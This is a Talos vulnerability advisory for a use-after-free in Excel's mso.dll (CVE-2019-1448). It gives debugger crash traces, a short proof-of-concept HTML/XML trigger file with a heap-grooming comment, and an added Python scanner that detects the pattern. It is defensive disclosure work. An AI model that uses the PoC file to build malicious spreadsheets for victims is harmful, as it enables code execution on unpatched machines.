Talos Vulnerability Report

TALOS-2019-0886

Microsoft Office Excel WorksheetOptions Code Execution Vulnerability

November 12, 2019
CVE Number

CVE-2019-1448

Summary

An exploitable use-after-free vulnerability exists in the mso.dll component of Microsoft Office. A specially crafted XLS file can cause a use-after-free, resulting in remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.

Tested Versions

Microsoft Office Professional Plus 2016 x86
Microsoft Office 365 ProPlus x86

Product URLs

https://products.office.com

CVSSv3 Score

8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-416: Use After Free

Details

This vulnerability is present in Microsoft Office Excel, which is part of the Microsoft Office collection of software applications used in an office environment. More precisely, the vulnerability is related to the component responsible for handling the Microsoft® Office HTML and XML format introduced in Microsoft Office 2000. A specially crafted XLS file written as a well-formed sequence of HTML/XML tags can lead to a use-after-free vulnerability and remote code execution. Attaching a debugger to Microsoft Excel and loading the malformed XLS file, we end up in the following context:

Critical error detected c0000374
(1708.1034): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=77c088e0 ecx=c0000374 edx=036d6c81 esi=00000002 edi=feeefeee
eip=77bdbebe esp=036d6df8 ebp=036d6e8c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
ntdll!RtlReportCriticalFailure+0x4b:
77bdbebe cc              int     3
0:000> !heap -triage
**************************************************************
*                                                            *
*                  HEAP ERROR DETECTED                       *
*                                                            *
**************************************************************

Details:

Heap address:  03850000
Error address: feeefeee
Error type: HEAP_FAILURE_INVALID_ARGUMENT
Details:    The caller tried to a free a block at an invalid
			(unaligned) address.
Follow-up:  Check the error's stack trace to find the culprit.


Stack trace:
Stack trace at 0x77c088e0
	77b2d448: ntdll!RtlFreeHeap+0xd8
	0f4fdc9e: mso20win32client!Ordinal456+0x8c
	06685fcd: mso!Ordinal1638+0x5a5
	00feaa7e: Excel!Ordinal43+0x5daa7e
	00fea2f5: Excel!Ordinal43+0x5da2f5
	02019ff2: Excel!MdCallBack+0x88377f
	00bd8594: Excel!Ordinal43+0x1c8594
	00bd20cb: Excel!Ordinal43+0x1c20cb
	00bd1789: Excel!Ordinal43+0x1c1789
	00bd016c: Excel!Ordinal43+0x1c016c
	00bcfc0e: Excel!Ordinal43+0x1bfc0e
	00bd2540: Excel!Ordinal43+0x1c2540
	00f34a8e: Excel!Ordinal43+0x524a8e
	00bd2a5d: Excel!Ordinal43+0x1c2a5d
	00ac34d9: Excel!Ordinal43+0xb34d9
	00ac1c4e: Excel!Ordinal43+0xb1c4e

As we can see, an invalid/corrupted pointer has been passed to RtlFreeHeap, causing a critical exception. This situation occurs either because of a heap overflow or because of a use-after-free, where the pointer is part of already released/garbage memory. Rerunning the application and tracking the execution flow before the exception appears, we notice that this is indeed a use-after-free vulnerability. We can observe it by setting a breakpoint at location mso!Ordinal2663+0x49 and checking the pointer value in the ecx register:

08108bec 8b4c241c   mov     ecx, dword ptr [esp+1Ch]
08108bf0 56         push    esi
08108bf1 e81c2fc3ff call    mso!Ordinal1699+0x26 (07d3bb12)
08108bf6 8bd0       mov     edx, eax

Breakpoint 0 hit
eax=1e829830 ebx=00000002 ecx=19fa0198 edx=00000003 esi=00000001 edi=ffffffff
eip=08108bf6 esp=03cdebfc ebp=19fa1110 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200216
mso!Ordinal2663+0x49:
08108bf6 8bd0            mov     edx,eax
0:000> !heap -p -a 19fa0198
	address 19fa0198 found in
	_HEAP @ 4d00000
	  HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state
		19fa0180 0005 0000  [00]   19fa0198    0000c - (busy)
		77bd4f6e ntdll!RtlpCallInterceptRoutine+0x00000026
		77b30e3e ntdll!RtlpAllocateHeapInternal+0x0000063e
		77b307d6 ntdll!RtlAllocateHeap+0x00000036
		f554256 mso20win32client!Ordinal951+0x000000a9
		f554211 mso20win32client!Ordinal951+0x00000064
		7d3ea04 mso!Ordinal2941+0x000000c7

Using that pointer, the function call mso!Ordinal1699+0x26 returns a pointer to an object strictly related to our PoC content. Dumping the memory that the eax pointer refers to, we see:

0:000> dd 1e829830
1e829830  00000007 0000006e 1a1e7238 00000024
1e829840  00000000 00000000 00000000 00000000
1e829850  ffffffff 00000000 00670061 00200073
1e829860  00320031 00200039 00780030 00300038
1e829870  00310030 00310030 00360030 00270000
1e829880  006f0062 006c006f 00200000 00610076
1e829890  0075006c 003d0065 00660027 006c0061
1e8298a0  00650073 00200000 003e002f 003c0020
0:000> du 1a1e7238
1a1e7238  "     <CISCO xmlns="">TALOS</CISC"
1a1e7278  "O>....???."

Running the application further, we stop again in the same place, but we see that the memory state of the object we are interested in has changed dramatically:

Breakpoint 0 hit
eax=20750ee0 ebx=00000002 ecx=19fa0198 edx=00000003 esi=00000001 edi=ffffffff
eip=07528bf6 esp=030df1dc ebp=19626ed0 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
mso!Ordinal2663+0x49:
07528bf6 8bd0            mov     edx,eax
0:000> !heap -p -a 19fa0198
	address 19fa0198 found in
	_HEAP @ 4d00000
	  HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state
		19fa0180 0005 0000  [00]   19fa0198    00020 - (free)
		
		77be5b24 ntdll!RtlDebugFreeHeap+0x0000003c
		77b9d5b7 ntdll!RtlpFreeHeap+0x0006dcc7
		77b2db3d ntdll!RtlFreeHeap+0x000007cd
		0f7fdc9e mso20win32client!Ordinal456+0x0000008c
		10b45fd5 mso!Ordinal1638+0x000005ad
		0148aa7e Excel!Ordinal43+0x005daa7e
		0148a2f5 Excel!Ordinal43+0x005da2f5
		024b9ff2 Excel!MdCallBack+0x0088377f
		01078594 Excel!Ordinal43+0x001c8594
		010720cb Excel!Ordinal43+0x001c20cb
		01071789 Excel!Ordinal43+0x001c1789
		0107016c Excel!Ordinal43+0x001c016c
		0106fc0e Excel!Ordinal43+0x001bfc0e
		01072540 Excel!Ordinal43+0x001c2540
		01072a71 Excel!Ordinal43+0x001c2a71
		00f634d9 Excel!Ordinal43+0x000b34d9
		00f61c4e Excel!Ordinal43+0x000b1c4e
		0103e747 Excel!Ordinal43+0x0018e747
		0103dcf0 Excel!Ordinal43+0x0018dcf0
		0e5599fd mso98win32client!Ordinal3239+0x000000b4
		10891f3b mso!Ordinal3673+0x0000073f
		107ab48b mso!Ordinal8171+0x00000381
		0e42bd53 mso98win32client!Ordinal24+0x0000088a
		1063b851 mso!Ordinal3356+0x00000ab2
		0d5742a5 mso40uiwin32client!Ordinal3455+0x00000146
		0d572feb mso40uiwin32client!Ordinal4414+0x00000071
		0d554ee6 mso40uiwin32client!Ordinal2538+0x00007a53
		0d51cc7e mso40uiwin32client!Ordinal2550+0x00000c14
		0d4e5220 mso40uiwin32client!Ordinal2351+0x0000027e
		0d502354 mso40uiwin32client!Ordinal3664+0x00000d40
		0d56bfd7 mso40uiwin32client!Ordinal1393+0x000000b3
 
0:000> !heap -p -a 1e829830
ReadMemory error for address 43340000
Use `!address 43340000' to check validity of the address.
	address 1e829830 found in
	_HEAP @ 4d00000
	  HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state
		1e8297e0 00e2 0000  [00]   1e8297f8    00708 - (free)	

As we can see, both objects have been freed. Further use of these objects during this test led to a double free:

Critical error detected c0000374
(19ac.e4): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=77c088e0 ecx=c0000374 edx=030defb1 esi=00000002 edi=20665900
eip=77bdbebe esp=030df120 ebp=030df1b4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
ntdll!RtlReportCriticalFailure+0x4b:
77bdbebe cc              int     3
0:000> kb
 # ChildEBP RetAddr  Args to Child              
00 030df1b4 77be4764 00000001 042e0000 77be3cfc ntdll!RtlReportCriticalFailure+0x4b
01 030df1c0 77be3cfc 404e4248 20665900 042e0000 ntdll!RtlpReportHeapFailure+0x2f
02 030df1f0 77b2d448 20665900 00000000 00000000 ntdll!RtlpLogHeapFailure+0xa7
03 030df24c 0fd2dc9e 042e0000 00000000 20665918 ntdll!RtlFreeHeap+0xd8
WARNING: Stack unwind information not available. Following frames may be wrong.
04 030df274 071602db 20665918 19625d50 20750ee0 mso20win32client!Ordinal456+0x8c
05 030df378 009baa7e 030df534 00000000 042e2468 mso!Ordinal7770+0x774
06 030df490 009ba2f5 00000100 191a3e48 00000003 Excel!Ordinal43+0x5daa7e
07 030e9fbc 019e9ff2 00000000 20678620 191a4bf8 Excel!Ordinal43+0x5da2f5
08 030ea004 005a8594 030fa28c 191a3e48 00000002 Excel!MdCallBack+0x88377f
09 030fa6cc 005a20cb 00000000 00000000 00000002 Excel!Ordinal43+0x1c8594
0a 030fa720 005a1789 00000000 00000000 00000002 Excel!Ordinal43+0x1c20cb
0b 030fcbcc 005a016c 00000000 030fcca8 030fcd68 Excel!Ordinal43+0x1c1789
0c 030fcd24 0059fc0e 00000000 00000014 030fcd68 Excel!Ordinal43+0x1c016c
0d 030fde8c 005a2540 3548a00b 00000000 00000014 Excel!Ordinal43+0x1bfc0e
0e 030fdf5c 005a2a71 00000016 00000000 00000000 Excel!Ordinal43+0x1c2540
0f 030fdf9c 004934d9 030fe838 00000016 00000000 Excel!Ordinal43+0x1c2a71
10 030fe404 00491c4e 00000016 00000000 00000000 Excel!Ordinal43+0xb34d9
11 030fe5b8 0056e747 00000016 00000000 1929dc40 Excel!Ordinal43+0xb1c4e
12 030feca4 0056dcf0 19403510 00000000 030fece8 Excel!Ordinal43+0x18e747
13 030fecb4 066199fd 026638ec 19403508 19403510 Excel!Ordinal43+0x18dcf0
14 030fece8 07271f3b 00000001 dc1dfe0e 1929dc40 mso98win32client!Ordinal3239+0xb4
15 030fed30 0718b48b 194d29a0 01000069 05fc9210 mso!Ordinal3673+0x73f
16 030fed90 064ebd53 194d29a0 00000069 05fc9210 mso!Ordinal8171+0x381
17 030fee24 0701b851 194d29a0 00000069 05fc9210 mso98win32client!Ordinal24+0x88a
18 030fee7c 05a342a5 194d29a0 00000020 05fc9210 mso!Ordinal3356+0xab2
19 030feeb0 05a32feb 18f5f310 05fc9210 191af1b0 mso40uiwin32client!Ordinal3455+0x146
1a 030feec8 05a14ee6 194d29a0 191af1b0 00000020 mso40uiwin32client!Ordinal4414+0x71
1b 030fef08 059dcc7e 18f5f310 194d29a0 1929ba80 mso40uiwin32client!Ordinal2538+0x7a53
1c 030fef4c 059a5220 1929ba80 05f680d0 05fc9210 mso40uiwin32client!Ordinal2550+0xc14
1d 030fef9c 059c2354 05f680d0 00000002 05fc9210 mso40uiwin32client!Ordinal2351+0x27e
1e 030fefd4 05a2bfd7 05f680d0 00000002 05fc9210 mso40uiwin32client!Ordinal3664+0xd40
1f 030ff010 05a8517d 1929ba80 05f680d0 030ff0ac mso40uiwin32client!Ordinal1393+0xb3
20 030ff030 05a2c0a4 19097b50 00000000 5932c70d mso40uiwin32client!Ordinal1633+0x1522
21 030ff064 05a2c4a0 19333ca8 19097b50 030ff0ac mso40uiwin32client!Ordinal1393+0x180
22 030ff0cc 059bb622 030ff384 5932c6c5 00040000 mso40uiwin32client!Ordinal345+0x1f6
23 030ff1ac 05979e59 193273e0 19333ca8 030ff384 mso40uiwin32client!Ordinal892+0xfce
24 030ff1fc 05a19bf7 193273e0 030ff328 00000000 mso40uiwin32client!Ordinal1828+0x744
25 030ff2d8 059cc8f6 193273e0 030ff328 193273ec mso40uiwin32client!Ordinal2580+0xbb
26 030ff310 059cc779 5932c425 06157b00 030ff3d4 mso40uiwin32client!Ordinal1879+0x1e1
27 030ff34c 05adc802 030ff384 00000001 00000001 mso40uiwin32client!Ordinal1879+0x64
28 030ff440 05ab397e 5932c3e5 19333ca8 19342d68 mso40uiwin32client!Ordinal373+0x33f
29 030ff48c 059bb3a6 000ff4ec 5932c205 00040000 mso40uiwin32client!Ordinal2256+0x12a
2a 030ff56c 05979e59 193273e0 19333ca8 19342d68 mso40uiwin32client!Ordinal892+0xd52
2b 030ff5bc 05a19bf7 193273e0 19342d68 00000000 mso40uiwin32client!Ordinal1828+0x744
2c 030ff694 05a8b704 193273e0 19342d68 193273e0 mso40uiwin32client!Ordinal2580+0xbb
2d 030ff6a8 05a1b057 19342d44 5932c185 00000000 mso40uiwin32client!Ordinal4322+0x165d
2e 030ff6ec 0597b134 18f59e80 01a701ff 030ff750 mso40uiwin32client!Ordinal1547+0x68d
2f 030ff71c 059d2a5c 5932cf61 004304f2 18f59e84 mso40uiwin32client!Ordinal4863+0x318
30 030ff808 059d244d 00000202 00000000 01a701ff mso40uiwin32client!Ordinal2761+0x33a
31 030ff858 77923277 00000000 00000202 00000000 mso40uiwin32client!Ordinal58+0xc65
32 030ff884 7791261b 059d23da 004304f2 00000202 USER32!_InternalCallWinProc+0x2b
33 030ff95c 77912197 004304f2 00000202 00000000 USER32!UserCallWinProcCheckWow+0x22b
34 030ff9c4 77911ff0 0044b4b4 030ffb58 0044b4e0 USER32!DispatchMessageWorker+0x197
35 030ff9d0 0044b4e0 030ffa50 030ffa44 0044b459 USER32!DispatchMessageW+0x10
36 030ffb58 003f16e3 0266be24 00000000 02f9c000 Excel!Ordinal43+0x6b4e0
37 030ffd6c 003e124f 003e0000 00000000 042e2b0b Excel!Ordinal43+0x116e3
38 030ffdb8 75489564 02f9c000 75489540 4fa28cf6 Excel!Ordinal43+0x124f
39 030ffdcc 77b5293c 02f9c000 404c4dac 00000000 KERNEL32!BaseThreadInitThunk+0x24
3a 030ffe14 77b52910 ffffffff 77b93c58 00000000 ntdll!__RtlUserThreadStart+0x2b
3b 030ffe24 00000000 003e10bd 02f9c000 00000000 ntdll!_RtlUserThreadStart+0x1b

Looking at the PoC file:

Line 1 	<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:x="urn:schemas-microsoft-com:office:excel" xmlns="http://www.w3.org/TR/REC-html40">
Line 2 	<xml>
Line 3 		<x:ExcelWorkbook>
Line 4 			<x:ExcelWorksheets>
Line 5 				<x:ExcelWorksheet>
Line 6 					<x:WorksheetOptions>
Line 7 						<CISCO>TALOS</CISCO>
Line 8 					</x:WorksheetOptions>
Line 9 				</x:ExcelWorksheet>
Line 10			</x:ExcelWorksheets>
Line 11		</x:ExcelWorkbook>
Line 12	</xml>
Line 13	<!-- HEAP FENG SHUI -->
Line 14	<xml>
Line 15	<x:ExcelWorkbook>
Line 16		<x:ExcelWorksheets>
Line 17			<x:ExcelWorksheet>
Line 18				<x:WorksheetOptions>									
Line 19				</x:WorksheetOptions>
Line 20			</x:ExcelWorksheet>
Line 21		</x:ExcelWorksheets>
Line 22	</x:ExcelWorkbook>
Line 23	</xml>

At line 7 we notice the element we observed during our analysis. Indeed, the vulnerability is related to the WorksheetOptions element and its subelements. It turns out that an object related to the ExcelWorkbook element is persistent, and if a document contains another ExcelWorkbook element, that object is reused. Because our WorksheetOptions element does not contain any valid subelement, the object is released, and it is subsequently reused while processing lines 18-19, causing the use-after-free. Proper heap grooming can give an attacker full control of this use-after-free vulnerability, and in consequence it can be turned into arbitrary code execution.
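The structural pattern described above (a WorksheetOptions element without recognized subelements, followed by a second ExcelWorkbook element in the same document) can be checked for statically before a file reaches Excel. The scanner below is an added example and is not part of the Talos report or of any Microsoft or Talos tooling. It assumes that legitimate WorksheetOptions subelements carry the x: prefix bound to urn:schemas-microsoft-com:office:excel (as in the PoC above), treats any other direct child as foreign, and uses the PoC from the report plus a constructed benign sample as inputs; the `x:Selected` child in the benign sample is an assumed value.

```python
"""Static check for the WorksheetOptions pattern from TALOS-2019-0886.

Office 2000-style spreadsheets are HTML documents with <xml> islands, so the
tolerant html.parser is used rather than a strict XML parser (the files are
rarely well-formed XML as a whole). Tag names arrive lower-cased.
"""
from html.parser import HTMLParser

# Prefix the PoC binds to the Excel namespace; subelements outside it are
# treated as "not a valid subelement" (assumption: heuristic, not an official list).
EXCEL_PREFIX = "x:"


class WorksheetOptionsScanner(HTMLParser):
    """Record every ExcelWorkbook and the direct children of each WorksheetOptions."""

    def __init__(self):
        super().__init__()
        self.stack = []        # open tags, used to identify direct children
        self.workbooks = 0     # number of x:ExcelWorkbook elements seen
        self.options = []      # per WorksheetOptions: list of direct child tag names
        self._current = None   # child list of the WorksheetOptions being parsed

    def handle_starttag(self, tag, attrs):
        if tag == "x:excelworkbook":
            self.workbooks += 1
        if tag == "x:worksheetoptions":
            self._current = []
            self.options.append(self._current)
        elif self._current is not None and self.stack and self.stack[-1] == "x:worksheetoptions":
            self._current.append(tag)  # direct child only; nested tags are ignored
        self.stack.append(tag)

    def handle_startendtag(self, tag, attrs):
        # <x:Selected/> style elements: open and immediately close
        self.handle_starttag(tag, attrs)
        self.handle_endtag(tag)

    def handle_endtag(self, tag):
        # Pop to the matching open tag, tolerating unbalanced markup
        if tag in self.stack:
            while self.stack:
                if self.stack.pop() == tag:
                    break
        if tag == "x:worksheetoptions":
            self._current = None


def scan(document: str) -> dict:
    """Return workbook count, WorksheetOptions children and a list of findings."""
    parser = WorksheetOptionsScanner()
    parser.feed(document)
    parser.close()
    findings = []
    unrecognized = 0  # WorksheetOptions elements with no x:-prefixed subelement
    for idx, children in enumerate(parser.options, 1):
        foreign = [c for c in children if not c.startswith(EXCEL_PREFIX)]
        recognized = [c for c in children if c.startswith(EXCEL_PREFIX)]
        if foreign:
            findings.append(f"WorksheetOptions #{idx}: child element(s) outside the x: namespace: {foreign}")
        if not recognized:
            unrecognized += 1
    if parser.workbooks > 1 and unrecognized:
        findings.append(
            f"{parser.workbooks} ExcelWorkbook elements and {unrecognized} WorksheetOptions "
            "without x: subelements: matches the object-reuse pattern of TALOS-2019-0886")
    return {"workbooks": parser.workbooks, "worksheet_options": parser.options, "findings": findings}


# Input 1: the PoC structure from the report (comment and namespaces as in the report).
POC_LIKE = """<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:x="urn:schemas-microsoft-com:office:excel" xmlns="http://www.w3.org/TR/REC-html40">
<xml><x:ExcelWorkbook><x:ExcelWorksheets><x:ExcelWorksheet><x:WorksheetOptions>
<CISCO>TALOS</CISCO>
</x:WorksheetOptions></x:ExcelWorksheet></x:ExcelWorksheets></x:ExcelWorkbook></xml>
<!-- HEAP FENG SHUI -->
<xml><x:ExcelWorkbook><x:ExcelWorksheets><x:ExcelWorksheet><x:WorksheetOptions>
</x:WorksheetOptions></x:ExcelWorksheet></x:ExcelWorksheets></x:ExcelWorkbook></xml>"""

# Input 2: constructed benign sample with a single workbook and an x: subelement.
BENIGN = """<html xmlns:x="urn:schemas-microsoft-com:office:excel">
<xml><x:ExcelWorkbook><x:ExcelWorksheets><x:ExcelWorksheet><x:WorksheetOptions>
<x:Selected/>
</x:WorksheetOptions></x:ExcelWorksheet></x:ExcelWorksheets></x:ExcelWorkbook></xml>"""

if __name__ == "__main__":
    for name, doc in (("poc-like", POC_LIKE), ("benign", BENIGN)):
        result = scan(doc)
        print(name, result["workbooks"], result["worksheet_options"])
        for finding in result["findings"]:
            print("  !", finding)
```

The check is intentionally structural: it does not need to know which WorksheetOptions subelements Excel accepts, only that the PoC relies on a WorksheetOptions element carrying no recognized subelement and on a second ExcelWorkbook that triggers the reuse of the released object. Files that match both conditions deserve a closer look before being opened on an unpatched build.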

Crash Information

Critical error detected c0000374
(ab8.16dc): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=77c088e0 ecx=c0000374 edx=030d6ad1 esi=00000002 edi=feeefeee
eip=77bdbebe esp=030d6c48 ebp=030d6cdc iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
ntdll!RtlReportCriticalFailure+0x4b:
77bdbebe cc              int     3
0:000> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************


KEY_VALUES_STRING: 1

	Key  : Analysis.CPU.Sec
	Value: 6

	Key  : Analysis.Elapsed.Sec
	Value: 6

	Key  : Analysis.Memory.CommitPeak.Mb
	Value: 121

	Key  : Timeline.OS.Boot.DeltaSec
	Value: 71853

	Key  : Timeline.Process.Start.DeltaSec
	Value: 31


PROCESSES_ANALYSIS: 1

SERVICE_ANALYSIS: 1

STACKHASH_ANALYSIS: 1

TIMELINE_ANALYSIS: 1

Timeline: !analyze.Start
	Name: <blank>
	Time: 2019-08-08T13:47:03.496Z
	Diff: 496 mSec

Timeline: Dump.Current
	Name: <blank>
	Time: 2019-08-08T13:47:03.0Z
	Diff: 0 mSec

Timeline: Process.Start
	Name: <blank>
	Time: 2019-08-08T13:46:32.0Z
	Diff: 31000 mSec

Timeline: OS.Boot
	Name: <blank>
	Time: 2019-08-07T17:49:30.0Z
	Diff: 71853000 mSec


DUMP_CLASS: 2

DUMP_QUALIFIER: 0

MODLIST_WITH_TSCHKSUM_HASH:  51debefa4d02cd8de76e538ddd2f7279f0854205

MODLIST_SHA1_HASH:  019f8eb6bf67cd378230ca5d9aebb87e5b1a37a3

NTGLOBALFLAG:  70

PROCESS_BAM_CURRENT_THROTTLED: 0

PROCESS_BAM_PREVIOUS_THROTTLED: 0

APPLICATION_VERIFIER_FLAGS:  0

PRODUCT_TYPE:  1

SUITE_MASK:  272

DUMP_TYPE:  fe

FAULTING_IP: 
ntdll!RtlReportCriticalFailure+4b
77bdbebe cc              int     3

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 77bdbebe (ntdll!RtlReportCriticalFailure+0x0000004b)
   ExceptionCode: 80000003 (Break instruction exception)
  ExceptionFlags: 00000000
NumberParameters: 3
   Parameter[0]: 00000000
   Parameter[1]: 00000000
   Parameter[2]: 00000000

FAULTING_THREAD:  000016dc

PROCESS_NAME:  Excel.exe

ERROR_CODE: (NTSTATUS) 0x80000003 - {WYJĄTEK}  Punkt przerwania  Osiągnięto punkt przerwania.

EXCEPTION_CODE: (HRESULT) 0x80000003 (2147483651) - Co najmniej jeden z argumentów jest nieprawidłowy.

EXCEPTION_CODE_STR:  80000003

EXCEPTION_PARAMETER1:  00000000

EXCEPTION_PARAMETER2:  00000000

EXCEPTION_PARAMETER3:  00000000

WATSON_BKT_PROCSTAMP:  5d173739

WATSON_BKT_PROCVER:  16.0.11328.20368

PROCESS_VER_PRODUCT:  Microsoft Office

WATSON_BKT_MODULE:  ntdll.dll

WATSON_BKT_MODSTAMP:  1d27c592

WATSON_BKT_MODOFFSET:  ebebe

WATSON_BKT_MODVER:  10.0.16299.15

MODULE_VER_PRODUCT:  Microsoft® Windows® Operating System

BUILD_VERSION_STRING:  16299.15.x86fre.rs3_release.170928-1534

ANALYSIS_SESSION_HOST:  DESKTOP-FIEQB1A

ANALYSIS_SESSION_TIME:  08-08-2019 15:47:03.0496

ANALYSIS_VERSION: 10.0.18914.1001 x86fre

THREAD_ATTRIBUTES: 
ADDITIONAL_DEBUG_TEXT:  Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD]

LAST_CONTROL_TRANSFER:  from 77be4764 to 77bdbebe

THREAD_SHA1_HASH_MOD_FUNC:  c38cef32e8677ad30a91ee30700b7ce53fe21f0d

THREAD_SHA1_HASH_MOD_FUNC_OFFSET:  ad71da21b0069034d236325f1a1b998adb590ec6

OS_LOCALE:  PLK

BUGCHECK_STR:  HEAP_CORRUPTION_ACTIONABLE_InvalidArgument

DEFAULT_BUCKET_ID:  HEAP_CORRUPTION_ACTIONABLE_InvalidArgument

PRIMARY_PROBLEM_CLASS:  HEAP_CORRUPTION

PROBLEM_CLASSES: 

	ID:     [0n261]
	Type:   [ACTIONABLE]
	Class:  Addendum
	Scope:  DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
			BUCKET_ID
	Name:   Add
	Data:   Add
			String: [InvalidArgument]
	PID:    [0xab8]
	TID:    [0x16dc]
	Frame:  [2] : ntdll!RtlpLogHeapFailure

	ID:     [0n262]
	Type:   [HEAP_CORRUPTION]
	Class:  Primary
	Scope:  DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
			BUCKET_ID
	Name:   Add
	Data:   Omit
	PID:    [0xab8]
	TID:    [0x16dc]
	Frame:  [3] : ntdll!RtlFreeHeap

STACK_TEXT:  
00000000 00000000 heap_corruption!Excel.exe+0x0


THREAD_SHA1_HASH_MOD:  ca4e26064d24ef7512d2e94de5a93c38dbe82fe9

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  heap_corruption!Excel.exe

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: heap_corruption

IMAGE_NAME:  heap_corruption

DEBUG_FLR_IMAGE_TIMESTAMP:  0

STACK_COMMAND:  !heap ; ** Pseudo Context ** ManagedPseudo ** Value: 7ffa6b0 ** ; kb

BUCKET_ID:  HEAP_CORRUPTION_ACTIONABLE_InvalidArgument_heap_corruption!Excel.exe

FAILURE_EXCEPTION_CODE:  80000003

FAILURE_IMAGE_NAME:  heap_corruption

BUCKET_ID_IMAGE_STR:  heap_corruption

FAILURE_MODULE_NAME:  heap_corruption

BUCKET_ID_MODULE_STR:  heap_corruption

FAILURE_FUNCTION_NAME:  Excel.exe

BUCKET_ID_FUNCTION_STR:  Excel.exe

BUCKET_ID_OFFSET:  0

BUCKET_ID_MODTIMEDATESTAMP:  0

BUCKET_ID_MODCHECKSUM:  0

BUCKET_ID_MODVER_STR:  0.0.0.0

BUCKET_ID_PREFIX_STR:  

FAILURE_PROBLEM_CLASS:  HEAP_CORRUPTION

FAILURE_SYMBOL_NAME:  heap_corruption!Excel.exe

FAILURE_BUCKET_ID:  HEAP_CORRUPTION_ACTIONABLE_InvalidArgument_80000003_heap_corruption!Excel.exe

TARGET_TIME:  2019-08-08T13:47:10.000Z

OSBUILD:  16299

OSSERVICEPACK:  15

SERVICEPACK_NUMBER: 0

OS_REVISION: 0

OSPLATFORM_TYPE:  x86

OSNAME:  Windows 10

OSEDITION:  Windows 10 WinNt SingleUserTS

USER_LCID:  0

OSBUILD_TIMESTAMP:  2016-09-06 09:40:45

BUILDDATESTAMP_STR:  170928-1534

BUILDLAB_STR:  rs3_release

BUILDOSVER_STR:  10.0.16299.15.x86fre.rs3_release.170928-1534

ANALYSIS_SESSION_ELAPSED_TIME:  19d6

ANALYSIS_SOURCE:  UM

FAILURE_ID_HASH_STRING:  um:heap_corruption_actionable_invalidargument_80000003_heap_corruption!excel.exe

FAILURE_ID_HASH:  {4c7ed077-e57f-2298-7edd-9e7a6d8bc771}

Followup:     MachineOwner
---------

0:000> lmDvmmso
Browse full module list
start    end        module name
059c0000 0705f000   mso        (export symbols)       C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll
	Loaded symbol image file: C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll
	Image path: C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll
	Image name: mso.dll
	Browse all global symbols  functions  data
	Timestamp:        Fri Jun 28 21:54:19 2019 (5D16EEFB)
	CheckSum:         0169B7F9
	ImageSize:        0169F000
	File version:     16.0.11328.20364
	Product version:  16.0.11328.20364
	File flags:       0 (Mask 3F)
	File OS:          40004 NT Win32
	File type:        2.0 Dll
	File date:        00000000.00000000
	Translations:     0409.04e4
	Information from resource tables:
		CompanyName:      Microsoft Corporation
		ProductName:      Microsoft Office
		InternalName:     MSO
		OriginalFilename: MSO.dll
		ProductVersion:   16.0.11328.20364
		FileVersion:      16.0.11328.20364
		FileDescription:  Microsoft Office component

Timeline

2019-08-16 - Vendor Disclosure
2019-11-12 - Public Release

Credit

Discovered by Marcin 'Icewall' Noga of Cisco Talos.